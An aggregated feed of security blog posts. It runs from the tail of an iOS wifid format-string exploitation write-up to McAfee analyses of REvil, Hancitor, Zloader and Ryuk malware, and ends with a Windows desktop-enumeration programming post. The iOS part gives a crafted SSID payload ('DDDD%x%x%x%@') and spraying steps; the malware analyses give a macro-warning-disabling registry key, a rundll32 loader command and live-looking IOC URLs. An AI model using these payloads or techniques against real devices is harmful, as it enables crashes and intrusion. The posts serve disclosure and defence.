
As part of the beacon frame mandatory field, SSID can store a string of up to 32 bytes. wifid assigns a string object for each detected SSID. You can observe that from the log. This is the most obvious thing we can use for spray.

Now attach a debugger to wifid and start flooding the device with a list of SSIDs that can be easily recognized. Turn on the iOS wifi feature and wait until it begins automatically scanning for available WiFi. The breakpoint will get triggered and check through the stack to find traces of spray. Below is the output of the lldb script:

The thing that caught our eye is the pointer stored at stack + offset 0x18. Since the SSID can store up to 32 bytes, the shortest format string escape character such as %x will occupy two bytes, which means that we can reach the range of 16 pointers stored on the stack with a single SSID at most. So stack + offset 0x18 could be reached by the fourth escape character. And the test results tell us that data at this offset could be controlled by the content we spray.

Step 3 – Test the Ability to Remotely Control the Code Execution Flow

So in the next test, we kept the Beacon Flooding Attack running, meanwhile we built a hotspot named “DDDD%x%x%x%@”. Notice that %@ is the fourth escape character. Unsurprisingly, wifid crashes as soon as it reads the name, and it automatically respawns and crashes again as long as the hotspot is still on.

Checking the crash, it appears that the x15 register is easily affected.

Now analyze where it crashed. As the effect of %@ format specifier, it’s trying to print Objective-C Object.

The code block highlighted in yellow is the desired code execution flow. x0 is the pointer stored at stack + offset 0x18. We try to control its content through the spray and lead the situation to the typical Use-After-Free scenario. x9 is the data x0 points to. It represents isa pointer, which is the first member of the objc object data structure. As you can see in the figure, control x9 is critical to reaching that objc_msgSend call at the bottom. With more tests, we confirmed that stack + offset 0x18 indeed can be affected by the spray.

Now things have become more familiar. Pass a controlled/fake Objc object to objc_msgSend to achieve arbitrary code execution. The next challenge is finding a way to spray memory filled with ROP/JOP payload.

Step 4 – Achieving Remote Code Execution

wifid deals with a lot of wireless features. Spraying large memory wirelessly is left as an exercise for the reader. Locally, this bug can be used to build a partial sandbox escape to help achieve jailbreaking.

Attacks-In-The-Wild?

Ironically, the events that triggered our interest in this vulnerability were not related to an attack and the two devices were only subject to a denial of service issue that was fixed on iOS 14.6.

However, since this vulnerability was widely published, and relatively easy to notice, we are highly confident that various threat actors have discovered the same information we did, and we would like to encourage an issuance of a patch as soon as possible.

ZecOps Mobile EDR Customers will identify attacks leveraging these vulnerabilities with the tag “WiFiDemon”.

Generating an Alert Using ZecOps Mobile EDR

We have added generic rules for detection of successful exploitation to our customers.

We also provided instructions to customers on how to create a rule to see failed spraying / ASLR bypass attempts.

To summarize:

A related vulnerability was exploitable as a 0-click until iOS 14.4. CVE was not assigned and the vulnerability was silently patched. The patch thanks an anonymous researcher.
The publicly announced WiFi vulnerability is exploitable on 14.6 when connecting a maliciously crafted SSID.
We highly recommend issuing a patch for this vulnerability.
Older devices: e.g. iPhone 5s are still on iOS 12.X which is not vulnerable to the 0-click vulnerability.

If you’d like to check your phone and monitor it – feel free to reach out to us here to discuss how we can help you increase your mobile visibility using ZecOps Mobile EDR.

We would like to thank @08tc3wbb (follow), @ihackbanme (follow) and SYMaster for assisting with this blog.

iOS 14.7 fix

The fix on iOS 14.7 is as follows, it’s pretty straightforward, adding “%s” as format-string and the SSID included string as a parameter solves the issue.

McAfee Blogs
REvil Ransomware Uses DLL SideloadingMcAfee Labs
16 July 2021 at 16:49

REvil Ransomware Uses DLL Sideloading

McAfee Blogs

By: McAfee Labs

16 July 2021 at 16:49

This blog was written byVaradharajan Krishnasamy, Karthickkumar, Sakshi Jaiswal

Introduction

Ransomware attacks are one of the most common cyber-attacks among organizations; due to an increase in Ransomware-as-a-service (RaaS) on the black market. RaaS provides readily available ransomware to cyber criminals and is an effective way for attackers to deploy a variety of ransomware in a short period of time.

Usually, RaaS model developers sell or rent their sophisticated ransomware framework on the black market. After purchasing the license from the ransomware developer, attackers spread the ransomware to other users, infect them, encrypt files, and demand a huge ransom payment in Bitcoin. Also, there are discounts available on the black market for ransomware frameworks in which the ransom money paid is shared between developers and the buyer for every successful extortion of ransom from the victims. These frameworks reduce the time and effort of creating a new ransomware from scratch using latest and advanced programming languages.

REvil is one of the most famous ransomware-as-a-service (RaaS) providers. The group released the Sodinokibi ransomware in 2019, and McAfee has since observed REvil using a DLL side loading technique to execute ransomware code. The actual ransomware is a dropper that contains two embedded PE files in the resource section. After successful execution, it drops two additional files named MsMpEng.exe and MpSvc.dll in the temp folder. The file MsMpEng.exe is a Microsoft digitally signed file having a timestamp of March 2014 (Figure 1).

Figure-1: Image of Microsoft Digitally signed File

DLL SIDE LOADING

The malware uses DLL side loading to execute the ransomware code. This technique allows the attacker to execute malicious DLLs that spoof legitimate ones. This technique has been used in many APTs to avoid detection. In this attack, MsMpEng.exe loads the functions of MpSvc.dll during the time of execution. However, the attacker has replaced the clean MpSvc.dll with the ransomware binary of the same name. The malicious DLL file has an export function named ServiceCrtMain, which is further called and executed by the Microsoft Defender file. This is a clever technique used by the attacker to execute malicious file using the Microsoft digitally signed binary.

Figure-2: Calling Export function

PAYLOAD ANALYSIS

The ransomware uses the RC4 algorithm to decrypt the config file which has all the information that supports the encryption process.

Figure-3: REvil Config File

Then it performs a UI language check using GetSystemDefaultUILanguage/GetUserDefaultUILanguage functions and compares it with a hardcoded list which contains the language ID of several countries as shown in below image.

Figure-4: Language Check

Countries excluded from this ransomware attack are mentioned below:

GetUserDefaultUILanguage	Country name
0x419	Russian
0x422	Ukranian
0x423	Belarusian
0x428	Tajik (Cyrilic from Tajikistan)
0x42B	Armenian
0x42C	Azerbaijani (Latin from Azerbaijan)
0x437	Georgian
0x43F	Kazakh from Kazakhastan
0x440	Kyrgyzstan
0x442	Turkmenistan
0x443	Latin from Uzbekistan
0x444	Tatar from Russia Federation
0x818	Romanian from Moldova
0x819	Russian from Moldova
0x82C	Cyrilic from Azerbaijan
0x843	Cyrilic from Uzbekistan
0x45A	Syriac
0x281A	Cyrilic from Serbia

Additionally, the ransomware checks the users keyboardlayout and it skips the ransomware infection in the machine’s which are present in the country list above.

Figure-5: Keyboardlayout check

Ransomware creates a Global mutex in the infected machine to mark its presence.

Figure-6: Global Mutex

After creating the mutex, the ransomware deletes the files in the recycle bin using the SHEmptyRecycleBinW function to make sure that no files are restored post encryption.

Figure-7: Empty Recycle Bin

Then it enumerates all the active services with the help of the EnumServicesStatusExW function and deletes services if the service name matches the list present in the config file. The image below shows the list of services checked by the ransomware.

Figure-8: Service List check

It calls the CreateToolhelp32Snapshot, Process32FirstW and Process32NextW functions to enumerate running processes and terminates those matching the list present in the config file. The following processes will be terminated.

allegro
steam
xtop
ocssd
xfssvccon
onenote
isqlplussvc
msaccess
powerpnt
cad
sqbcoreservic
thunderbird
oracle
infopath
dbeng50
pro_comm_msg
agntsvc
thebat
firefox
ocautoupds
winword
synctime
tbirdconfig
mspub
visio
sql
ocomm
orcad
mydesktopserv
dbsnmp
outlook
cadence
excel
wordpad
creoagent
encsvc
mydesktopqos

Then, it encrypts files using the Salsa20 algorithm and uses multithreading for fast encryption of the files. Later, background wallpaper will be set with a ransom message.

Figure-9: Desktop Wallpaper

Finally, the ransomware displays ransom notes in the victim’s machine. Below is an image of readme.txt which is dropped in the infected machine.

Figure-10: Ransom Note

IOCs and Coverage

Type	Value	Detection Name	Detection Package Version (V3)
Loader	5a97a50e45e64db41049fd88a75f2dd2	REvil.f	4493
Dropped DLL	78066a1c4e075941272a86d4a8e49471	REvil.e	4493

Expert rules allow McAfee customers to extend their coverage. This rule covers this REvil ransomware behaviour.

MITRE

Technique ID	Tactic	Technique Details
T1059.003	Execution	Command and Scripting Interpreter
T1574.002	DLL Side-Loading	Hijack Execution Flow
T1486	Impact	Data Encrypted for Impact
T1036.005	Defense Evasion	Masquerading
T1057	Discovery	Process Discovery
T1082	Discovery	System Information Discovery

Conclusion

McAfee observed that the REvil group has utilized oracle web logic vulnerability (CVE-2019-2725) to spread the ransomware last year and used kaseya’s VSA application recently for their ransomware execution, with the help of DLL sideloading. REvil uses many vulnerability applications for ransomware infections, however the encryption technique remains the same. McAfee recommends making periodic backups of files and keeping them isolated off the network and having an always updated antivirus in place.

The post REvil Ransomware Uses DLL Sideloading appeared first on McAfee Blog.

McAfee Blogs
Hancitor Making Use of Cookies to Prevent URL ScrapingMcAfee Labs
8 July 2021 at 22:15

Hancitor Making Use of Cookies to Prevent URL Scraping

McAfee Blogs

By: McAfee Labs

8 July 2021 at 22:15

Consejos para protegerte de quienes intentan hackear tus correos electrónicos

This blog was written by Vallabh Chole & Oliver Devane

Over the years, the cybersecurity industry has seen many threats get taken down, such as the Emotet takedown in January 2021. It doesn’t usually take long for another threat to attempt to fill the gap left by the takedown. Hancitor is one such threat.

Like Emotet, Hancitor can send Malspams to spread itself and infect as many users as possible. Hancitor’s main purpose is to distribute other malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware and Zeppelin Ransomware. The dropped Cobalt Strike beacons can then be used to move laterally around the infected environment and also execute other malware such as ransomware.

This blog will focus on a new technique used by Hancitor created to prevent crawlers from accessing malicious documents used to download and execute the Hancitor payload.

The infection flow of Hancitor is shown below:

A victim will receive an email with a fake DocuSign template to entice them to click a link. This link leads him to feedproxy.google.com, a service that works similar to an RSS Feed and enables site owners to publish site updates to its users.

When accessing the link, the victim is redirected to the malicious site. The site will check the User-Agent of the browser and if it is a non-Windows User-Agent the victim will be redirected to google.com.

If the victim is on a windows machine, the malicious site will create a cookie using JavaScript and then reload the site.

The code to create the cookie is shown below:

The above code will write the Timezone to value ‘n’ and the time offset to UTC in value ‘d’ and set it into cookie header for an HTTP GET Request.

For example, if this code is executed on a machine with timezone set as BST the values would be:

d = 60

n = “Europe/London”

These values may be used to prevent further malicious activity or deploy a different payload depending on geo location.

Upon reloading, the site will check if the cookie is present and if it is, it will present them with the malicious document.

A WireShark capture of the malicious document which includes the cookie values is shown below:

The document will prompt them to enable macros and, when enabled, it will download the Hancitor DLL and then load it with Rundll32.

Hancitor will then communicate with its C&C and deploy further payloads. If running on a Windows domain, it will download and deploy a Cobalt Strike beacon.

Hancitor will also deploy SendSafe which is a spam module, and this will be used to send out malicious spam emails to infect more victims.

Conclusion

With its ability to send malicious spam emails and deploy Cobalt Strike beacons, we believe that Hancitor will be a threat closely linked to future ransomware attacks much like Emotet was. This threat also highlights the importance of constantly monitoring the threat landscape so that we can react quickly to evolving threats and protect our customers from them.

IOCs, Coverage, and MITRE

IOCs

IOC	Type	IOC	Coverage	Content Version
Malicious Document	SHA256	e389a71dc450ab4077f5a23a8f798b89e4be65373d2958b0b0b517de43d06e3b	W97M/Dropper.hx	4641
Hancitor DLL	SHA256	c703924acdb199914cb585f5ecc6b18426b1a730f67d0f2606afbd38f8132ad6	Trojan-Hancitor.a	4644
Domain hosting Malicious Document	URL	http[:]//onyx-food[.]com/coccus.php	RED	N/A
Domain hosting Malicious Document	URL	http[:]//feedproxy[.]google[.]com/~r/ugyxcjt/~3/4gu1Lcmj09U/coccus.php	RED	N/A

Mitre

Technique ID	Tactic	Technique details
T1566.002	Initial Access	Spam mail with links
T1204.001	Execution	User Execution by opening link.
T1204.002	Execution	Executing downloaded doc
T1218	Defence Evasion	Signed Binary Execution Rundll32
T1055	Defence Evasion	Downloaded binaries are injected into svchost for execution
T1482	Discovery	Domain Trust Discovery
T1071	C&C	HTTP protocol for communication
T1132	C&C	Data is base64 encoded and xored

The post Hancitor Making Use of Cookies to Prevent URL Scraping appeared first on McAfee Blog.

McAfee Blogs
Zloader With a New Infection TechniqueMcAfee Labs
8 July 2021 at 21:44

Zloader With a New Infection Technique

McAfee Blogs

By: McAfee Labs

8 July 2021 at 21:44

This blog was written by Kiran Raj & Kishan N.

Introduction

In the last few years, Microsoft Office macro malware using social engineering as a means for malware infection has been a dominant part of the threat landscape. Malware authors continue to evolve their techniques to evade detection. These techniques involve utilizing macro obfuscation, DDE, living off the land tools (LOLBAS), and even utilizing legacy supported XLS formats.

McAfee Labs has discovered a new technique that downloads and executes malicious DLLs (Zloader) without any malicious code present in the initial spammed attachment macro. The objective of this blog is to cover the technical aspect of the newly observed technique.

Infection map

Threat Summary

The initial attack vector is a phishing email with a Microsoft Word document attachment.
Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.
The Word document Visual Basic for Applications (VBA) reads the cell contents of the downloaded XLS file and writes into the XLS VBA as macros.
Once the macros are written to the downloaded XLS file, the Word document sets the policy in the registry to Disable Excel Macro Warning and calls the malicious macro function dynamically from the Excel file,
This results in the downloading of the Zloader payload. The Zloader payload is then executed by rundll32.exe.

The section below contains the detailed technical analysis of this technique.

Detailed Technical Analysis

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, the Word document, in turn, downloads and opens another password-protected Microsoft Excel document.

After downloading the XLS file, the Word VBA reads the cell contents from XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions.

Once the macros are written and ready, the Word document sets the policy in the registry to Disable Excel Macro Warning and invokes the malicious macro function from the Excel file. The Excel file now downloads the Zloader payload. The Zloader payload is then executed using rundll32.exe.

Figure-1: flowchart of the Infection chain

Word Analysis

Here is how the face of the document looks when we open the document (figure 2). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-2: Image of Word Document Face

The userform combo-box components present in the Word document stores all the content required to connect to the remote Excel document including the Excel object, URL, and the password required to open the Excel document. The URL is stored in the Combobox in the form of broken strings which will be later concatenated to form a complete clear string.

Figure-3: URL components (right side) and the password to open downloaded Excel document (“i5x0wbqe81s”) present in user-form components.

VBA Macro Analysis of Word Document

Figure-4: Image of the VBA editor

In the above image of macros (figure 4), the code is attempting to download and open the Excel file stored in the malicious domain. Firstly, it creates an Excel application object by using CreateObject() function and reading the string from Combobox-1 (ref figure-2) of Userform-1 which has the string “excel. Application” stored in it. After creating the object, it uses the same object to open the Excel file directly from the malicious URL along with the password without saving the file on the disk by using Workbooks.Open() function.

Figure-5: Word Macro code that reads strings present in random cells in Excel sheet.

The above snippet (figure 5) shows part of the macro code that is reading the strings from the Excel cells.

For Example:

Ixbq = ifk.sheets(3).Cells(44,42).Value

The code is storing the string present in sheet number 3 and the cell location (44,42) into the variable “ixbq”. The Excel.Application object that is assigned to variable “ifk” is used to access sheets and cells from the Excel file that is opened from the malicious domain.

In the below snippet (figure 6), we can observe the strings stored in the variables after being read from the cells. We can observe that it has string related to the registry entry “HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM” that is used to disable trust access for VBA into Excel and the string “Auto_Open3” that is going to be the entry point of the Excel macro execution.

We can also see the strings “ThisWorkbook”, “REG_DWORD”, “Version”, “ActiveVBProject” and few random functions as well like “Function c4r40() c4r40=1 End Function”. These macro codes cannot be detected using static detection since the content is formed dynamically on run time.

Figure-6: Value of variables after reading Excel cells.

After extracting the contents from the Excel cells, the parent Word file creates a new VBA module in the downloaded Excel file by writing the retrieved contents. Basically, the parent Word document is retrieving the cell contents and writing them to XLS macros.

Once the macro is formed and ready, it modifies the below RegKey to disable trust access for VBA on the victim machine to execute the function seamlessly without any Microsoft Office Warnings.

HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM

After writing macro contents to Excel file and disabling the trust access, function ’Auto_Open3()’ from newly written excel VBA will be called which downloads zloader dll from the ‘hxxp://heavenlygem.com/22.php?5PH8Z’ with extension .cpl

Figure-7: Image of ’Auto_Open3()’ function

The downloaded dll is saved in %temp% folder and executed by invoking rundll32.exe.

Figure-8: Image of zloader dll invoked by rundll32.exe

Command-line parameter:

Rundll32.exe shell32.dll,Control_RunDLL “<path downloaded dll>”

Windows Rundll32 commands loads and runs 32-bit DLLs that can be used for directly invoking specified functions or used to create shortcuts. In the above command line, the malware uses “Rundll32.exe shell32.dll,Control_RunDLL” function to invoke control.exe (control panel) and passes the DLL path as a parameter, therefore the downloaded DLL is executed by control.exe.

Excel Document Analysis:

The below image (figure 9) is the face of the password-protected Excel file that is hosted on the server. We can observe random cells storing chunks of strings like “RegDelete”, “ThisWorkbook”, “DeleteLines”, etc.

These strings present in worksheet cells are formed as VBA macro in the later stage.

Figure-9: Image of Remote Excel file.

Coverage and prevention guidance:

McAfee’s Endpoint products detect this variant of malware and files dropped during the infection process.

The main malicious document with SHA256 (210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf) is detected with V3 package version – 4328.0 as “W97M/Downloader.djx”. The final Zloader payload with SHA-256 (c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2)which is a DLL is detected by signature “Zloader-FCVP” with V3 package version – 4327.0

Additionally, with the help of McAfee’s Expert rule feature, customers can strengthen the security by adding custom Expert rules based on the behavior patterns of the malware. The below EP rule is specific to this infection pattern.

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the macro execution for Office files. We advise everyone to read our blog on this new variant of Zloader and its infection cycle to understand more about the threat.

Different techniques & tactics are used by the malware to propagate and we mapped these with the MITRE ATT&CK platform.

E-mail Spear Phishing (T1566.001): Phishing acts as the main entry point into the victim’s system where the document comes as an attachment and the user enables the document to execute the malicious macro and cause infection. This mechanism is seen in most of the malware like Emotet, Drixed, Trickbot, Agenttesla, etc.
Execution (T1059.005): This is a very common behavior observed when a malicious document is opened. The document contains embedded malicious VBA macros which execute code when the document is opened/closed.
Defense Evasion (T1218.011): Execution of signed binary to abuse Rundll32.exe and to proxy execute the malicious code is observed in this Zloader variant. This tactic is now also part of many others like Emotet, Hancitor, Icedid, etc.
Defense Evasion (T1562.001): In this tactic, it Disables or Modifies security features in Microsoft Office document by changing the registry keys.

IOC

Type	Value	Scanner	Detection Name	Detection Package Version (V3)
Main Word Document	210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf	ENS	W97M/Downloader.djx	4328
Downloaded dll	c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2	ENS	Zloader-FCVP	4327
URL to download XLS	hxxp://heavenlygem.com/11.php	WebAdvisor	Blocked	N/A
URL to download dll	hxxp://heavenlygem.com/22.php?5PH8Z	WebAdvisor	Blocked	N/A

Conclusion

Malicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload as we discussed in this blog. Usage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads.

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.

The post Zloader With a New Infection Technique appeared first on McAfee Blog.

McAfee Blogs
New Ryuk Ransomware Sample Targets WebserversMarc Elias
7 July 2021 at 04:01

New Ryuk Ransomware Sample Targets Webservers

McAfee Blogs

By: Marc Elias

7 July 2021 at 04:01

Executive Summary

Ryuk is a ransomware that encrypts a victim’s files and requests payment in Bitcoin cryptocurrency to release the keys used for encryption. Ryuk is used exclusively in targeted ransomware attacks.

Ryuk was first observed in August 2018 during a campaign that targeted several enterprises. Analysis of the initial versions of the ransomware revealed similarities and shared source code with the Hermes ransomware. Hermes ransomware is a commodity malware for sale on underground forums and has been used by multiple threat actors.

To encrypt files Ryuk utilizes a combination of symmetric AES (256-bit) encryption and asymmetric RSA (2048-bit or 4096-bit) encryption. The symmetric key is used to encrypt the file contents, while the asymmetric public key is used to encrypt the symmetric key. Upon payment of the ransom the corresponding asymmetric private key is released, allowing the encrypted files to be decrypted.

Because of the targeted nature of Ryuk infections, the initial infection vectors are tailored to the victim. Often seen initial vectors are spear-phishing emails, exploitation of compromised credentials to remote access systems and the use of previous commodity malware infections. As an example of the latter, the combination of Emotet and TrickBot, have frequently been observed in Ryuk attacks.

Coverage and Protection Advice

Ryuk is detected as Ransom-Ryuk![partial-hash].

Defenders should be on the lookout for traces and behaviours that correlate to open source pen test tools such as winPEAS, Lazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal behavior of non-malicious tools that have a dual use. These seemingly legitimate tools (e.g., ADfind, PSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1, Part2).

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common among ransomware criminals:
E-mail Spear phishing (T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim’s network. We have observed this in the past with the likes of Trickbot & Ryuk or Qakbot & Prolock, etc.
Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see our blog explaining RDP security.
Valid accounts can also be obtained via commodity malware such as infostealers that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading endpoint protection, as well as enabling options like tamper protection and Rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

Ryuk ransomware is used exclusively in targeted attacks

Latest sample now targets webservers

New ransom note prompts victims to install Tor browser to facilitate contact with the actors

After file encryption, the ransomware will print 50 copies of the ransom note on the default printer

Learn more about Ryuk ransomware, including Indicators of Compromise, Mitre ATT&CK techniques and Yara Rule, by reading our detailed technical analysis.

The post New Ryuk Ransomware Sample Targets Webservers appeared first on McAfee Blog.

Pavel Yosifovich
Processes, Threads, and WindowsPavel Yosifovich
3 July 2021 at 12:19

Processes, Threads, and Windows

Pavel Yosifovich

By: Pavel Yosifovich

3 July 2021 at 12:19

The relationship between processes and threads is fairly well known – a process contains one or more threads, running within the process, using process wide resources, like handles and address space.

Where do windows (those usually-rectangular elements, not the OS) come into the picture?

The relationship between a process, its threads, and windows, along with desktop and Window Stations, can be summarized in the following figure:

A process, threads, windows, desktops and a Window Station

A window is created by a thread, and that thread is designated as the owner of the window. The creating thread becomes a UI thread (if it’s the first User/GDI call it makes), getting a message queue (provided internally by Win32k.sys in the kernel). Every occurrence in the created window causes a message to be placed in the message queue of the owner thread. This means that if a thread creates 100 windows, it’s responsible for all these windows.

“Responsible” here means that the thread must perform something known as “message pumping” – pulling messages from its message queue and processing them. Failure to do that processing would lead to the infamous “Not Responding” scenario, where all the windows created by that thread become non-responsive. Normally, a thread can read its own message queue only – other threads can’t do it for that thread – this is a single threaded UI scheme used by the Windows OS by default. The simplest message pump would look something like this:

MSG msg;
while(::GetMessage(&msg, nullptr, 0, 0)) {
    ::TranslateMessage(&msg);
    ::DispatchMessage(&msg);
}

The call to GetMessage does not return until there is a message in the queue (filling up the MSG structure), or the WM_QUIT message has been retrieved, causing GetMessage to return FALSE and the loop exited. WM_QUIT is the message typically used to signal an application to close. Here is the MSG structure definition:

typedef struct tagMSG {
  HWND   hwnd;
  UINT   message;
  WPARAM wParam;
  LPARAM lParam;
  DWORD  time;
  POINT  pt;
} MSG, *PMSG;

Once a message has been retrieved, the important call is to DispatchMessage, that looks at the window handle in the message (hwnd) and looks up the window class that this window instance is a member of, and there, finally, the window procedure – the callback to invoke for messages destined to these kinds of windows – is invoked, handling the message as appropriate or passing it along to default processing by calling DefWindowProc. (I may expand on that if there is interest in a separate post).

You can enumerate the windows owned by a thread by calling EnumThreadWindows. Let’s see an example that uses the Toolhelp API to enumerate all processes and threads in the system, and lists the windows created (owned) by each thread (if any).

We’ll start by creating a snapshot of all processes and threads (error handling mostly omitted for clarity):

#include <Windows.h>
#include <TlHelp32.h>
#include <unordered_map>
#include <string>

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(
        TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);

We’ll build a map of process IDs to names for easy lookup later on when we show details of a process:

PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);

// we can skip the idle process
::Process32First(hSnapshot, &pe);

std::unordered_map<DWORD, std::wstring> processes;
processes.reserve(500);

while (::Process32Next(hSnapshot, &pe)) {
	processes.insert({ pe.th32ProcessID, pe.szExeFile });
}

Now we loop through all the threads, calling EnumThreadWindows and showing the results:

THREADENTRY32 te;
te.dwSize = sizeof(te);
::Thread32First(hSnapshot, &te);

static int count = 0;

struct Data {
	DWORD Tid;
	DWORD Pid;
	PCWSTR Name;
};
do {
	if (te.th32OwnerProcessID <= 4) {
		// idle and system processes have no windows
		continue;
	}
	Data d{ 
        te.th32ThreadID, te.th32OwnerProcessID, 
        processes.at(te.th32OwnerProcessID).c_str() 
    };
	::EnumThreadWindows(te.th32ThreadID, [](auto hWnd, auto param) {
		count++;
		WCHAR text[128], className[32];
		auto data = reinterpret_cast<Data*>(param);
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		printf("TID: %6u PID: %6u (%ws) HWND: 0x%p [%ws] %ws\n",
			data->Tid, data->Pid, data->Name, hWnd,
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;	// bring in the next window
		}, reinterpret_cast<LPARAM>(&d));
} while (::Thread32Next(hSnapshot, &te));
printf("Total windows: %d\n", count);

EnumThreadWindows requires the thread ID to look at, and a callback that receives a window handle and whatever was passed in as the last argument. Returning TRUE causes the callback to be invoked with the next window until the window list for that thread is complete. It’s possible to return FALSE to terminate the enumeration early.

I’m using a lambda function here, but only a non-capturing lambda can be converted to a C function pointer, so the param value is used to provide context for the lambda, with a Data instance having the thread ID, its process ID, and the process name.

The call to GetClassName returns the name of the window class, or type of window, if you will. This is similar to the relationship between objects and classes in object orientation. For example, all buttons have the class name “button”. Of course, the windows enumerated are only top level windows (have no parent) – child windows are not included. It is possible to enumerate child windows by calling EnumChildWindows.

Going the other way around – from a window handle to its owner thread and *its* owner process is possible with GetWindowThreadProcessId.

Desktops

A window is placed on a desktop, and is bound to it. More precisely, a thread is bound to a desktop once it creates its first window (or has any hook installed with SetWindowsHookEx). Before that happens, a thread can attach itself to a desktop by calling SetThreadDesktop.

Normally, a thread will use the “default” desktop, which is where a logged in user sees his or her windows appearing. It is possible to create additional desktops using the CreateDesktop API. A classic example is the desktops Sysinternals tool. See my post on desktops and windows stations for more information.

It’s possible to redirect a new process to use a different desktop (and optionally a window station) as part of the CreateProcess call. The STARTUPINFO structure has a member named lpDesktop that can be set to a string with the format “WindowStationName\DesktopName” or simply “DesktopName” to keep the parent’s window station. This could look something like this:

STARTUPINFO si = { sizeof(si) };
// WinSta0 is the interactive window station
WCHAR desktop[] = L"Winsta0\\MyOtherDesktop";
si.lpDesktop = desktop;
PROCESS_INFORMATION pi;
::CreateProcess(..., &si, &pi);

“WinSta0” is always the name of the interactive Window Station (one of its desktops can be visible to the user).

The following example creates 3 desktops and launches notepad in the default desktop and the other desktops:

void LaunchInDesktops() {
	HDESK hDesktop[4] = { ::GetThreadDesktop(::GetCurrentThreadId()) };
	for (int i = 1; i <= 3; i++) {
		hDesktop[i] = ::CreateDesktop(
			(L"Desktop" + std::to_wstring(i)).c_str(),
			nullptr, nullptr, 0, GENERIC_ALL, nullptr);
	}
	STARTUPINFO si = { sizeof(si) };
	WCHAR name[32];
	si.lpDesktop = name;
	DWORD len;
	PROCESS_INFORMATION pi;
	for (auto h : hDesktop) {
		::GetUserObjectInformation(h, UOI_NAME, name, sizeof(name), &len);
		WCHAR pname[] = L"notepad";
		if (::CreateProcess(nullptr, pname, nullptr, nullptr, FALSE,
			0, nullptr, nullptr, &si, &pi)) {
			printf("Process created: %u\n", pi.dwProcessId);
			::CloseHandle(pi.hProcess);
			::CloseHandle(pi.hThread);
		}
	}
}

If yoy run the above function, you’ll see one Notepad window on your desktop. If you dig deeper, you’ll find 4 notepad.exe processes in Task Manager. The other three have created their windows in different desktops. Task Manager gives no indication of that, nor does the process list in Process Explorer. However, we see a hint in the list of handles of these “other” notepad processes. Here is one:

Curiously enough, desktop objects are not stored as part of the kernel’s Object Manager namespace. If you double-click the handle, copy its address, and look it up in the kernel debugger, this is the result:

lkd> !object 0xFFFFAC8C12035530
Object: ffffac8c12035530  Type: (ffffac8c0f2fdbc0) Desktop
    ObjectHeader: ffffac8c12035500 (new version)
    HandleCount: 1  PointerCount: 32701
    Directory Object: 00000000  Name: Desktop1

Notice the directory object address is zero – it’s not part of any directory. It has meaning in the context of its containing Window Station.

You might think that we can use the EnumThreadWindows as demonstrated at the beginning of this post to locate the other notepad windows. Unfortunately, access is restricted and those notepad windows are not listed (more on that possibly in a future post).

We can try a different approach by using yet another enumration function – EnumDesktopWindows. Given a powerful enough desktop handle, we can enumerate all top level windows in that desktop:

void ListDesktopWindows(HDESK hDesktop) {
	::EnumDesktopWindows(hDesktop, [](auto hWnd, auto) {
		WCHAR text[128], className[32];
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		DWORD pid;
		auto tid = ::GetWindowThreadProcessId(hWnd, &pid);
		printf("TID: %6u PID: %6u HWND: 0x%p [%ws] %ws\n",
			tid, pid, hWnd, 
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;
		}, 0);
}

The lambda body is very similar to the one we’ve seen earlier. The difference is that we start with a window handle with no thread ID. But it’s fairly easy to get the owner thread and process with GetWindowThreadProcessId. Here is one way to invoke this function:

auto hDesktop = ::OpenDesktop(L"Desktop1", 0, FALSE, DESKTOP_ENUMERATE);
ListDesktopWindows(hDesktop);

Here is the resulting output:

